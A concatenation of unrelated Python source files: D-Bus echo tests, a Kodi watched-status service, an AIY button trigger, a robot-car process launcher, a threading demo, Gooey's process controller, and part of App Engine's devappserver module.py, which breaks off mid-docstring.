assert self.echo('i', (0,)) == (0,)
assert self.echo('i', (10,)) == (10,)
assert self.echo('i', (0x7fffffff,)) == (0x7fffffff,)
def test_arg_int32_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('i', (-0x80000001,))
self.echo('i', (0x80000000,))
def test_arg_uint32(self):
assert self.echo('u', (0,)) == (0,)
assert self.echo('u', (10,)) == (10,)
assert self.echo('u', (0xffffffff,)) == (0xffffffff,)
def test_arg_uint32_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('u', (-1,))
self.echo('q', (0x100000000,))
def test_arg_int64(self):
assert self.echo('x', (-0x8000000000000000,)) == (-0x8000000000000000,)
assert self.echo('x', (-10,)) == (-10,)
assert self.echo('x', (0,)) == (0,)
assert self.echo('x', (10,)) == (10,)
assert self.echo('x', (0x7fffffffffffffff,)) == (0x7fffffffffffffff,)
def test_arg_int64_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('x', (-0x8000000000000001,))
self.echo('x', (0x8000000000000000,))
def test_arg_uint64(self):
assert self.echo('t', (0,)) == (0,)
assert self.echo('t', (10,)) == (10,)
assert self.echo('t', (0xffffffffffffffff,)) == (0xffffffffffffffff,)
def test_arg_uint64_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('t', (-1,))
self.echo('t', (0x10000000000000000,))
def test_arg_boolean(self):
assert self.echo('b', (False,)) == (False,)
assert self.echo('b', (True,)) == (True,)
assert self.echo('b', (0,)) == (False,)
assert self.echo('b', (1,)) == (True,)
assert self.echo('b', ([],)) == (False,)
assert self.echo('b', ([1],)) == (True,)
assert self.echo('b', ({},)) == (False,)
assert self.echo('b', ({"": ""},)) == (True,)
assert self.echo('b', ((),)) == (False,)
assert self.echo('b', ((1),)) == (True,)
assert self.echo('b', (None,)) == (False,)
def test_arg_double(self):
assert self.echo('d', (-1e100,)) == (-1e100,)
assert self.echo('d', (-1.0,)) == (-1.0,)
assert self.echo('d', (-1e-100,)) == (-1e-100,)
assert self.echo('d', (0.0,)) == (0.0,)
assert self.echo('d', (1e-100,)) == (1e-100,)
assert self.echo('d', (1.0,)) == (1.0,)
assert self.echo('d', (1e100,)) == (1e100,)
def test_arg_double_special(self):
inf = 1e1000
assert self.echo('d', (inf,)) == (inf,)
assert self.echo('d', (-inf,)) == (-inf,)
assert self.echo('d', (1 / inf,)) == (1 / inf,) # 0
assert self.echo('d', (1 / -inf,)) == (1 / -inf,) # -0
nan = inf / inf
assert math.isnan(self.echo('d', (nan,))[0]) # note: nan != nan
def test_arg_string(self):
assert self.echo('s', ('',)) == ('',)
assert self.echo('s', ('foo',)) == ('foo',)
def test_arg_string_unicode(self):
assert self.echo('s', (u'foo \u20ac',)) == (u'foo \u20ac',)
def test_arg_object_path(self):
assert self.echo('o', ('/foo/bar',)) == ('/foo/bar',)
def test_arg_object_path_unicode(self):
assert self.echo('o', (u'/foo/bar',)) == (u'/foo/bar',)
def test_arg_invalid_object_path(self):
with self.assertRaises(DBusError):
self.echo('o', ('foo',))
self.echo('o', ('foo/bar',))
self.echo('o', ('/foo/bar/',))
self.echo('o', ('/foo//bar/',))
self.echo('o', ('/foo bar/',))
def test_arg_signature(self):
assert self.echo('g', ('iii',)) == ('iii',)
def test_arg_signature_unicode(self):
assert self.echo('g', (u'iii',)) == (u'iii',)
def test_arg_invalid_signature(self):
with self.assertRaises(DBusError):
self.echo('*', (1,))
self.echo('(i', (1,))
self.echo('i' * 256, (1,) * 256)
def nested_tuple(d, v):
if d == 0:
return (v,)
return (nested_tuple(d - 1, v),)
with self.assertRaises(DBusError):
self.echo('(' * 33 + 'i' + ')' * 33,
nested_tuple(33, 1))
self.echo('a' * 33 + 'i', nested_tuple(33, 1))
def test_arg_variant(self):
assert self.echo('v', (('i', 10),)) == (('i', 10),)
assert self.echo('v', (('ai', [1, 2, 3]),)) == (('ai', [1, 2, 3]),)
def test_arg_variant_unicode(self):
assert self.echo('v', ((u'i', 10),)) == ((u'i', 10),)
assert self.echo('v', ((u'ai', [1, 2, 3]),)) == ((u'ai', [1, 2, 3]),)
def test_arg_invalid_variant(self):
with self.assertRaises(DBusError):
self.echo('v', (('ii', (1, 2)),))
def test_arg_multi(self):
assert self.echo('ii', (1, 2)) == (1, 2)
assert self.echo('iii', (1, 2, 3)) == (1, 2, 3)
def test_arg_too_few(self):
with self.assertRaises(DBusError):
self.echo('ii', (1,))
def test_arg_too_many(self):
with self.assertRaises(DBusError):
self.echo('ii', (1, 2, 3))
def test_arg_struct(self):
assert self.echo('(i)', ((1,),)) == ((1,),)
assert self.echo('(ii)', ((1, 2),)) == ((1, 2),)
assert self.echo('(iii)', ((1, 2, 3),)) == ((1, 2, 3),)
assert self.echo('(((((i)))))', ((((((1,),),),),),)) == \
((((((1,),),),),),)
def test_arg_invalid_struct(self):
with self.assertRaises(DBusError):
self.echo('(i', ((10,),))
self.echo('(i}', ((10,),))
def test_arg_array(self):
assert self.echo('ai', ([1],)) == ([1],)
assert self.echo('ai', ([1, 2],)) == ([1, 2],)
assert self.echo('ai', ([1, 2, 3],)) == ([1, 2, 3],)
assert self.echo('a(ii)', ([(1, 2), (3, 4)],)) == ([(1, 2), (3, 4)],)
assert self.echo('av', ([('i', 10), ('s', 'foo')],)) == \
([('i', 10), ('s', 'foo')],)
def test_arg_dict(self):
assert self.echo('a{ss}', ({'foo': 'bar'},)) == ({'foo': 'bar'},)
assert self.echo('a{ss}', ({'foo': 'bar', 'baz': 'qux'},)) == \
({'foo': 'bar', 'baz': 'qux'},)
assert self.echo('a{si}', ({'foo': 10},)) == ({'foo': 10},)
assert self.echo('a{ii}', ({1: 10},)) == ({1: 10},)
def test_arg_byte_array(self):
assert self.echo('ay', (b'foo',)) == (b'foo',)
def test_arg_byte_array_illegal_type(self):
with self.assertRaises(DBusError):
self.echo('ay', ([1, 2, 3],))
def test_exceptions(self):
error = self.echo_exception('ss', ['SpecialException', 'message'])
print(error, type(error))
self.assertEquals(error.__class__.__name__, 'SpecialException')
self.assertEquals(error.type, 'SpecialException')
self.assertEquals(error.args[0], 'message')
assert isinstance(error, DBusError)
error = self.echo_exception('s', ['Missing second argument, which raises an ValueError'])
self.assertEquals(error.__class__.__name__, 'ValueError')
self.assertEquals(error.type, 'ValueError')
self.assertTrue(error.args[0] in ('need more than 1 value to unpack', 'not enough values to unpack (expected 2, got 1)'))
assert isinstance(error, DBusError)
class EchoHandlerBase(object):
def __init__(self, signal_handler=None):
super(EchoHandlerBase, self).__init__()
self.signal_handler = signal_handler
@method(interface=IFACE_EXAMPLE, member="Echo")
def echo_method(self, message):
self.set_response(message.get_signature(), message.get_args())
@method(interface=IFACE_EXAMPLE, member="EchoException")
def echo_exception(self, message):
name, message = message.get_args()
raise type(str(name), (Exception,), {})(message)
@signal_handler(interface=IFACE_EXAMPLE, member="Echo")
def echo_signal(self, message):
if self.signal_handler:
self.signal_handler(message)
@method(interface=IFACE_EXAMPLE, member="Stop")
def stop(self, _):
self.connection.stop()
class EchoHandlerInherit(EchoHandlerBase, DBusHandler):
pass
@dbus_object
class EchoHandlerDecorator(EchoHandlerBase):
pass
class TestMessageASimple(unittest.TestCase, MessageTest):
@classmethod
def dbus_server(cls, conn):
conn.dispatch()
@classmethod
def setUpClass(cls):
super(TestMessageASimple, cls).setUpClass()
handler = EchoHandlerInherit()
conn = SimpleDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
cls.server_name = conn.get_unique_name()
cls.server = Thread(target=cls.dbus_server, args=(conn,))
cls.server.start()
cls.client = SimpleDBusConnection(DBUS_BUS_SESSION)
@classmethod
def tearDownClass(cls):
cls.client.call_method('/', 'Stop', IFACE_EXAMPLE, destination=cls.server_name)
cls.server.join()
super(TestMessageASimple, cls).tearDownClass()
class TestMessageGEvent(unittest.TestCase, MessageTest):
@classmethod
def setUpClass(cls):
super(TestMessageGEvent, cls).setUpClass()
handler = EchoHandlerInherit()
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
cls.server_name = conn.get_unique_name()
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
class TestMessageDecorated(unittest.TestCase, MessageTest):
@classmethod
def setUpClass(cls):
super(TestMessageDecorated, cls).setUpClass()
handler = EchoHandlerDecorator()
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
cls.server_name = conn.get_unique_name()
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
class TestMessageName(unittest.TestCase, MessageTest):
@classmethod
def setUpClass(cls):
super(TestMessageName, cls).setUpClass()
cls.server_name = "org.tdbus.Test"
handler = EchoHandlerInherit()
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.register_name(cls.server_name)
conn.add_handler(handler)
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
class TestMessageSignal(unittest.TestCase, MessageTest):
last_message = None
@classmethod
def setUpClass(cls):
super(TestMessageSignal, cls).setUpClass()
cls.server_name = "org.tdbus.Test"
def signal_handler_f(message):
logging.getLogger('tdbus').info(message)
cls.last_message = message
handler = EchoHandlerInherit(signal_handler_f)
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.register_name(cls.server_name)
conn.add_handler(handler)
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
def echo(self, signature=None, args=None):
self.client.send_signal('/', 'Echo', IFACE_EXAMPLE, signature, args,
destination=self.server_name)
# Wait a sec to server can process the message
gevent.sleep(0.1)
return self.last_message.get_args()
class TestMessageSignalMatched(unittest.TestCase, MessageTest):
last_message = None
@classmethod
def setUpClass(cls):
super(TestMessageSignalMatched, cls).setUpClass()
cls.server_name = "org.tdbus.Test"
def signal_handler_f(message):
logging.getLogger('tdbus').info(message)
cls.last_message = message
handler = EchoHandlerInherit(signal_handler_f)
conn = GEventDBusConnection(DBUS_BUS_SESSION)
conn.add_handler(handler)
conn.subscribe_to_signals()
cls.client = GEventDBusConnection(DBUS_BUS_SESSION)
def echo(self, signature=None, args=None):
self.client.send_signal('/', 'Echo', IFACE_EXAMPLE, signature, args)
# Wait a sec to server can process the message
gevent.sleep(0.01)
return self.last_message.get_args()
|
service.py
|
# -*- coding: utf-8 -*-
def start(api):
core = api.core
monitor = core.kodi.xbmc.Monitor()
class XBMCPlayer(core.kodi.xbmc.Player):
def onPlayBackStarted(): pass
def onPlayBackEnded(): pass
def onPlayBackStopped(): pass
player = XBMCPlayer()
watched = lambda: None
watched.playing_imdb_id = None
watched.play_count = None
watched.time_played = None
watched.total_time = None
update = lambda: None
update.last_check = None
def reset_vars():
watched.playing_imdb_id = None
watched.play_count = None
watched.time_played = None
watched.total_time = None
def update_playing_imdb_id(retry):
reset_vars()
core.kodi.xbmc.sleep(5000)
try:
video_meta = player.getVideoInfoTag()
watched.playing_imdb_id = video_meta.getIMDBNumber()
watched.play_count = video_meta.getPlayCount()
except: update_playing_imdb_id(retry=False) if retry else None
def mark_as_watched():
try:
if not watched.playing_imdb_id or not watched.time_played or not watched.total_time:
return
percent_played = watched.time_played / watched.total_time
if percent_played < 0.90:
return
core.profile(core, core.utils.DictAsObject({ 'type': 'mark_as_watched', 'id': watched.playing_imdb_id, 'silent': True }))
finally:
reset_vars()
player.onPlayBackStarted = lambda: update_playing_imdb_id(retry=True)
player.onPlayBackEnded = lambda: mark_as_watched()
player.onPlayBackStopped = lambda: mark_as_watched()
while not monitor.abortRequested():
if monitor.waitForAbort(2):
break
if not update.last_check or core.time.time() - update.last_check >= 3600:
update.last_check = core.time.time()
thread = core.threading.Thread(target=core.provider, args=(core, core.utils.DictAsObject({ 'type': 'new_version_check', 'silent': True })))
thread.start()
if watched.play_count and watched.play_count > 0:
continue
has_video = (core.kodi.xbmc.getCondVisibility('VideoPlayer.Content(movies)') or core.kodi.xbmc.getCondVisibility('VideoPlayer.Content(episodes)'))
has_video_duration = core.kodi.xbmc.getCondVisibility('Player.HasDuration')
if not has_video or not has_video_duration:
continue
if not watched.total_time:
try: watched.total_time = player.getTotalTime()
except: pass
try: watched.time_played = player.getTime()
except: pass
|
aiy_trigger.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import threading
from gpiozero import Button
from gpiozero import LED
BLINK_ON_TIME_S = 0.5
BLINK_OFF_TIME_S = 0.5
BUTTON_HOLD_TIME_S = 5
BASE_GPIO_FILE = '/sys/module/gpio_aiy_io/drivers/platform:gpio-aiy-io/gpio-aiy-io/gpio/gpiochip*/base'
BASE_GPIO = int(subprocess.run('cat %s' % BASE_GPIO_FILE, shell=True, capture_output=True).stdout.strip())
BUTTON_GPIO = 23
BUTTON_LED_GPIO = 25
def _write(path, data):
with open(path, 'w') as file:
file.write(str(data))
class OnboardLED(object):
def _run(self, on_time, off_time):
gpio = BASE_GPIO + (13, 14)[self._led]
_write('/sys/class/gpio/export', gpio)
try:
while not self._event.is_set():
_write('/sys/class/gpio/AIY_LED%d/direction' % self._led, 'low')
self._event.wait(on_time)
_write('/sys/class/gpio/AIY_LED%d/direction' % self._led, 'high')
self._event.wait(off_time)
finally:
_write('/sys/class/gpio/unexport', gpio)
def __init__(self, led):
self._led = led
self._thread = None
def blink(self, on_time, off_time):
self._event = threading.Event()
self._thread = threading.Thread(target=self._run, args=(on_time, off_time), daemon=True)
self._thread.start()
def off(self):
if self._thread:
self._event.set()
self._thread.join()
self._thread = None
class AiyTrigger(object):
"""Trigger interface for AIY kits."""
def __init__(self, triggered):
self._triggered = triggered
self._active = False
if os.path.exists('/sys/class/gpio/gpiochip%d' % BASE_GPIO):
self._led = OnboardLED(0)
else:
self._led = LED(BUTTON_LED_GPIO)
self._button = Button(BUTTON_GPIO, hold_time=BUTTON_HOLD_TIME_S)
self._button.when_held = triggered
def Close(self):
self._led.off()
def SetActive(self, active):
if active:
self._led.blink(on_time=BLINK_ON_TIME_S, off_time=BLINK_OFF_TIME_S)
else:
self._led.off()
|
main.py
|
import multiprocessing as mp
from multiprocessing import Process, Value, Array
import time
from UI.uimain import showui
from opencv.main import cv
from motor.main import line_run
from config import *
from control.maincontrol import CarControlRun, FlagRun
from init import init
if __name__ == '__main__':
# 图像共享队列
img_res_q = mp.Queue()
# 动态共享参数值
# 状态
CarStatus = Value('i', -1) # Car状态 -1 停止 0 主控接管 1 巡线 2 校准 3 执行任务
LinerSpeed = Value('i', conf_base_speed) # UI与Motor共享
AngularSpeed = Value('i', conf_angle_speed) # UI与Motor共享
XSpeed = Value('i', conf_X_speed)
YSpeedChangeRate = Value('i', conf_Y_Change_speed)
AngleChangeRate = Value('i', conf_Angle_Change_speed)
CityList = Array('i', range(3)) # 1 2 3
Flag_Run = Array('i', [1] * 3)
print("正在启动初始化既诊断程序...")
init()
print("正在启动主程序...")
ui_p = Process(target=showui, args=(CarStatus, LinerSpeed, AngularSpeed, XSpeed, YSpeedChangeRate, AngleChangeRate, CityList, Flag_Run))
ui_p.start()
cv_p = Process(target=cv, args=(img_res_q, XSpeed))
cv_p.start()
line_p = Process(target=line_run, args=(img_res_q, CarStatus, LinerSpeed, AngularSpeed, XSpeed, YSpeedChangeRate, AngleChangeRate))
line_p.start()
time.sleep(0.5)
control_p = Process(target=CarControlRun, args=(CarStatus,CityList,Flag_Run))
control_p.start()
ui_p.join()
cv_p.join()
line_p.join()
control_p.join()
|
thread-python.py
|
from threading import Thread
from time import sleep
def timer(t):
for i in range(t):
print(i)
sleep(1)
thread1 = Thread(target=timer, args=(7, ))
thread1.start()
thread2 = Thread(target = timer, args = (8, ))
thread2.start()
|
processor.py
|
import os
import re
import subprocess
import sys
from functools import partial
from threading import Thread
from gooey.gui import events
from gooey.gui.pubsub import pub
from gooey.gui.util.casting import safe_float
from gooey.gui.util.taskkill import taskkill
from gooey.util.functional import unit, bind
class ProcessController(object):
def __init__(self, progress_regex, progress_expr, hide_progress_msg,
encoding, shell=True):
self._process = None
self.progress_regex = progress_regex
self.progress_expr = progress_expr
self.hide_progress_msg = hide_progress_msg
self.encoding = encoding
self.wasForcefullyStopped = False
self.shell_execution = shell
def was_success(self):
self._process.communicate()
return self._process.returncode == 0
def poll(self):
if not self._process:
raise Exception('Not started!')
self._process.poll()
def stop(self):
if self.running():
self.wasForcefullyStopped = True
taskkill(self._process.pid)
def running(self):
return self._process and self.poll() is None
def run(self, command):
self.wasForcefullyStopped = False
env = os.environ.copy()
env["GOOEY"] = "1"
env["PYTHONIOENCODING"] = self.encoding
try:
self._process = subprocess.Popen(
command.encode(sys.getfilesystemencoding()),
stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=self.shell_execution, env=env)
except:
self._process = subprocess.Popen(
command,
stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr = subprocess.STDOUT, shell = self.shell_execution, env=env)
t = Thread(target=self._forward_stdout, args=(self._process,))
t.start()
def _forward_stdout(self, process):
'''
Reads the stdout of `process` and forwards lines and progress
to any interested subscribers
'''
while True:
line = process.stdout.readline()
if not line:
break
_progress = self._extract_progress(line)
pub.send_message(events.PROGRESS_UPDATE, progress=_progress)
if _progress is None or self.hide_progress_msg is False:
pub.send_message(events.CONSOLE_UPDATE,
msg=line.decode(self.encoding))
pub.send_message(events.EXECUTION_COMPLETE)
def _extract_progress(self, text):
'''
Finds progress information in the text using the
user-supplied regex and calculation instructions
'''
# monad-ish dispatch to avoid the if/else soup
find = partial(re.search, string=text.strip().decode(self.encoding))
regex = unit(self.progress_regex)
match = bind(regex, find)
result = bind(match, self._calculate_progress)
return result
def _calculate_progress(self, match):
'''
Calculates the final progress value found by the regex
'''
if not self.progress_expr:
return safe_float(match.group(1))
else:
return self._eval_progress(match)
def _eval_progress(self, match):
'''
Runs the user-supplied progress calculation rule
'''
_locals = {k: safe_float(v) for k, v in match.groupdict().items()}
if "x" not in _locals:
_locals["x"] = [safe_float(x) for x in match.groups()]
try:
return int(eval(self.progress_expr, {}, _locals))
except:
return None
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os
import os.path
import random
import re
import string
import struct
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
runtime_config.threadsafe = self._module_configuration.threadsafe or False
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
# AppScale: Pack both API ports into the same field.
if (self._external_api_port is not None and
self._module_configuration.runtime == 'python27'):
port_bytes = struct.pack('HH', self._api_port, self._external_api_port)
runtime_config.api_port = struct.unpack('I', port_bytes)[0]
else:
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._module_configuration.runtime == 'php':
if self._php_executable_path:
runtime_config.php_config.php_executable_path = (
self._php_executable_path)
runtime_config.php_config.enable_debugger = (
self._enable_php_remote_debugging)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
